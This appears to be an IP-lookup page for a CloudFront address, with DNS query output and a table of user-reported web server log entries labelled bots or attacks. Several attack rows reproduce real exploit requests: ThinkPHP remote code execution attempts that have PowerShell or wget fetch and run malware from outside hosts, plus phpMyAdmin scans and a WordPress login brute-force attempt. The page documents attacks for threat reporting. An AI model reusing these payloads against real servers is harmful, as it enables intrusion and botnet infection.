城市(city): unknown
省份(region): unknown
国家(country): United States
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 13.249.38.114
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 10999
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;13.249.38.114. IN A
;; AUTHORITY SECTION:
. 135 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022021702 1800 900 604800 86400
;; Query time: 55 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 18 11:20:05 CST 2022
;; MSG SIZE rcvd: 106114.38.249.13.in-addr.arpa domain name pointer server-13-249-38-114.iad89.r.cloudfront.net.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
114.38.249.13.in-addr.arpa name = server-13-249-38-114.iad89.r.cloudfront.net.
Authoritative answers can be found from:| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 121.201.98.53 | bots | 121.201.98.53 - - [03/Apr/2019:13:30:46 +0800] "GET /index.php/category/root/deep-learning/geoffrey-hinton/ HTTP/1.1" 200 9321 "-" "-" 121.201.98.53 - - [03/Apr/2019:13:30:48 +0800] "GET /index.php/category/root/deep-learning/yann-lecun/ HTTP/1.1" 200 11081 "-" "-" 121.201.98.53 - - [03/Apr/2019:13:30:52 +0800] "GET /index.php/category/root/deep-learning/yoshua-bengio/ HTTP/1.1" 200 11401 "-" "-" 121.201.98.53 - - [03/Apr/2019:13:30:54 +0800] "GET /index.php/category/root/deep-learning/fei-fei-li/ HTTP/1.1" 200 9369 "-" "-" |
2019-04-03 13:32:54 |
| 173.48.102.40 | attack | 173.48.102.40 - - [07/Apr/2019:06:51:11 +0800] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C hrome/72.0.3626.119 Safari/537.36" 173.48.102.40 - - [07/Apr/2019:06:51:12 +0800] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C hrome/72.0.3626.119 Safari/537.36" 173.48.102.40 - - [07/Apr/2019:06:51:13 +0800] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C hrome/72.0.3626.119 Safari/537.36" |
2019-04-07 09:18:17 |
| 122.224.77.194 | normal | mgjip |
2019-04-06 08:54:44 |
| 116.255.152.176 | attack | 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //ysy.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //ysy.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //lequ.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //lequ.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //plus/laobiao.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //plus/laobiao.php HTTP/1.1" 404 232 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //3G.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //3G.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-10 10:27:18 |
| 118.25.49.95 | attack | 118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-02 20:03:22 |
| 103.26.136.6 | attack | 103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET HTTP/1.1" 400 182 "-" "-" 103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 103.26.136.6 - - [09/Apr/2019:22:16:02 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 103.26.136.6 - - [09/Apr/2019:22:16:03 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 103.26.136.6 - - [09/Apr/2019:22:16:04 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" |
2019-04-09 22:24:14 |
| 71.6.167.142 | bots | 71.6.167.142 - - [08/Apr/2019:20:08:35 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 71.6.167.142 - - [08/Apr/2019:20:08:35 +0800] "GET /robots.txt HTTP/1.1" 301 194 "-" "-" 71.6.167.142 - - [08/Apr/2019:20:08:36 +0800] "GET /sitemap.xml HTTP/1.1" 301 194 "-" "-" 71.6.167.142 - - [08/Apr/2019:20:08:36 +0800] "GET /.well-known/security.txt HTTP/1.1" 301 194 "-" "-" |
2019-04-08 20:17:40 |
| 111.206.198.14 | bots | 百度渲染爬虫,主要爬取图片以及css、js等 111.206.198.14 - - [08/Apr/2019:04:55:14 +0800] "GET /wp-content/uploads/2018/12/SIF-1.png HTTP/1.1" 200 47291 "https://www.eznewstoday.com/index.php/2018/12/10/a-simple-but-tough-to-beat-baseline-for-sentence-embeddings/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 111.206.221.7 - - [08/Apr/2019:04:55:14 +0800] "GET /wp-content/ql-cache/quicklatex.com-ac9d53e7cc9ffa75a70082f94665c349_l3.png HTTP/1.1" 200 4258 "https://www.eznewstoday.com/index.php/2018/12/10/a-simple-but-tough-to-beat-baseline-for-sentence-embeddings/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 111.206.198.70 - - [08/Apr/2019:04:55:14 +0800] "GET /wp-content/ql-cache/quicklatex.com-ac9d53e7cc9ffa75a70082f94665c349_l3.svg HTTP/1.1" 200 7427 "https://www.eznewstoday.com/index.php/2018/12/10/a-simple-but-tough-to-beat-baseline-for-sentence-embeddings/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" |
2019-04-08 05:09:52 |
| 203.76.71.194 | attack | 203.76.71.194 - - [07/Apr/2019:20:50:34 +0800] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' HTTP/1.1" 400 182 "-" "Akari(selfrep)" |
2019-04-07 20:51:49 |
| 1.20.100.97 | attack | 1.20.100.97 - - [08/Apr/2019:08:27:17 +0800] "POST https://www.eznewstoday.com/wp-login.php HTTP/1.1" 200 5534 "https://www.eznewstoday.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.54.17) Gecko/20166441 Firefox/52.54.17" |
2019-04-08 08:28:11 |
| 77.247.109.8 | attack | 端口扫描 黑客攻击 |
2019-04-04 08:12:04 |
| 132.232.212.45 | attack | 132.232.212.45 - - [11/Apr/2019:06:03:48 +0800] "GET /phppma/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 132.232.212.45 - - [11/Apr/2019:06:03:48 +0800] "GET /phpmy/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 132.232.212.45 - - [11/Apr/2019:06:03:48 +0800] "GET /mysql/admin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 132.232.212.45 - - [11/Apr/2019:06:03:48 +0800] "GET /mysql/dbadmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 132.232.212.45 - - [11/Apr/2019:06:03:48 +0800] "GET /mysql/sqlmanager/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 132.232.212.45 - - [11/Apr/2019:06:03:48 +0800] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 132.232.212.45 - - [11/Apr/2019:06:03:48 +0800] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" |
2019-04-11 06:05:03 |
| 119.146.144.118 | attack | 119.146.144.118 - - [10/Apr/2019:11:36:18 +0800] "POST /kvcollect?BossId=2865&Pwd=1698957057&uin=&vid=b07924sdtpe&coverid=&pid=&guid=&cmid=&unid=&vt=&type=&url=https%3A%2F%2Fv.qq.com%2Ftxp%2Fiframe%2Fplayer.html%3Fvid%3Db07924sdtpe&bi=&bt=&version=3.4.40&platform=11001&format=&defn=&ctime=2019-04-10%2011%3A36%3A18&ptag=&isvip=-1&tpid=&pversion=h5&hc_uin=&hc_main_login=&hc_vuserid=&hc_openid=&hc_appid=&hc_pvid=&hc_ssid=&hc_qq=&hh_ua=&ua=&ckey=&iformat=&hh_ref=https%3A%2F%2Fv.qq.com%2Ftxp%2Fiframe%2Fplayer.html%3Fvid%3Dcurrent_date&vuid=&vsession=&format_ua=other&common_rcd_info=&common_ext_info=&v_idx=0&rcd_info=&extrainfo=&vurl=&step=3&val=1&idx=0&c_info=&diagonal=511&isfocustab=0&isvisible=0&cpay=0&tpay=0&dltype=1 HTTP/1.1" 301 194 "http://imgcache.qq.com/tencentvideo_v1/player/TPout.swf" "-" |
2019-04-10 11:36:43 |
| 42.56.30.66 | attack | 42.56.30.66 - - [09/Apr/2019:21:03:03 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-04-09 21:06:38 |
| 195.231.6.16 | attack | 端口扫描,攻击IP |
2019-04-09 14:39:18 |